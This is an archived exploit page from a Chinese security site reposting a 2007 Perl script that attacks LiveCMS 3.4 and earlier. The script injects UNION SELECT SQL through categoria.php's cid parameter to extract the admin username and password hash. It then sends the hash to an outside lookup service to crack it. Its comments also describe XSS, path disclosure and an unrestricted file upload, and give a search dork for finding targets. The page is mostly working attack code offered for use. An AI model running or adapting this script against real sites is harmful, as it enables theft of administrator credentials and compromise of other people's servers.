首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit
来源:TrinTiTTY [at] g00ns.net 作者:TrinTiTTY 发布时间:2007-06-21  
#!/usr/bin/perl
##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#INFO:
#Program Title ################################################################################
#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
#
#Description ##################################################################################
#This is a free CMS system.
#
#Script Download ##############################################################################
#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
#http://livecms.com
#
#Original Advisory #############################################################################
#http://www.g00ns-forum.net/showthread.php?t=9350
#
#Exploit #######################################################################################
#credz to Vipsta and Clorox for vulnerability
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net
#
#Details #######################################################################################                             
#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
#variable. example: categoria.php?cid='
#XSS: Article names are not properly santised, a user could insert malicious javascript
#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
#can be uploaded.  A user could upload a malicious script with this method and compromise the server.
#GoogleDork: "powered by livecms"
#
################################################################################################
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
#                LiveCMS <= 3.3  [ categoria.php ]               #
#                    ] Remote SQL Injection [                    #
#                                                                #
#              [c]ode by TrinTiTTY [at] g00ns.net                #
#              Vulnerability by Vipsta and Clorox                #
#                                                                #
#                                                                #
#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

use LWP;

$host = @ARGV[0];
$ua = LWP::UserAgent->new;

my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';

if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &getUser( ) }



sub getUser( ) {
  system("color 4");
  &top( );
  print "\n [~] Retrieving admin username\n";
  $nameres = $ua->get("http://$host/$uject");

  $namecon = $nameres->content;

  if ($namecon =~ /<td>(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi)
  {
     $user = $4;
     print "\n [+] Admin user retrieved: $user\n";
     print "\n [~] Retrieving password for $user\n";
     getPass( )
  }
  else {
      print "\n [-] Unable to retrieve admin username\n";
      print "\n [~] Retrieving password\n";
      getPass( )
  }
}

sub getPass( ) {

  $passres = $ua->get("http://$host/$pject");

  $passCon = $passres->content;

  if ($passCon =~ /<td>(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi)
  {
     $pass = $4;
     print "\n [+] Admin password retrieved: $pass\n";
     &resolveHash($pass);
     system("color 7");
  }
  else {
      print "\n [-] Unable to retrieve admin password\n";
      system("color 7");
      exit(0);
  }
}

sub resolveHash($)
{
  print "\n [~] Attempting to resolve hash\n";
  $hashget = LWP::UserAgent->new;  #thx gdata
  $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
  $hashans = $resp->content;
  if ($hashans =~ m\width="35%"><b>([  -_a-z0-9.*?&=;<>/""]{1,25})</b></td>\){
     $crack = $1;
     print "\n [+] Password hash resolved: $crack\n";
     system("color 7");
     exit(0);
  }
  else {
     print "\n [-] Couldn't resolve hash\n";
     system("color 7");
     exit(0);
  }
}
sub top( )
{
  print q {
  ##################################################################
  #                LiveCMS <= 3.3  [ categoria.php ]               #
  #                    ] Remote SQL Injection [                    #
  #                                                                #
  #                [c]ode by TrinTiTTY [at] g00ns.net              #
  #                Vulnerability by Vipsta and Clorox              #
  ##################################################################
  }
}
sub usage( )
{
  print "\n Usage: perl livecms33.pl <host>\n";
  print "\n Example: perl livecms33.pl www.example.com/path\n\n";
  exit(0);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jasmine CMS 1.0 SQL Injection/
·LAN Management System (LMS) <=
·PHP 5.2.3 Tidy extension Local
·BitchX 1.1-final (EXEC) Remote
·Solar Empire <= 2.9.1.1 Blind
·HTTP SERVER (httpsv) 1.6.2 (GE
·MiniBB 2.0.5 (language) Local
·SerWeb 0.9.4 (load_lang.php) R
·PHP::HTML 0.6.4 (phphtml.php)
·Apache mod_jk 1.2.19/1.2.20 Re
·Sitellite CMS <= 4.2.12 (55966
·BarCode ActiveX Control BarCod
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved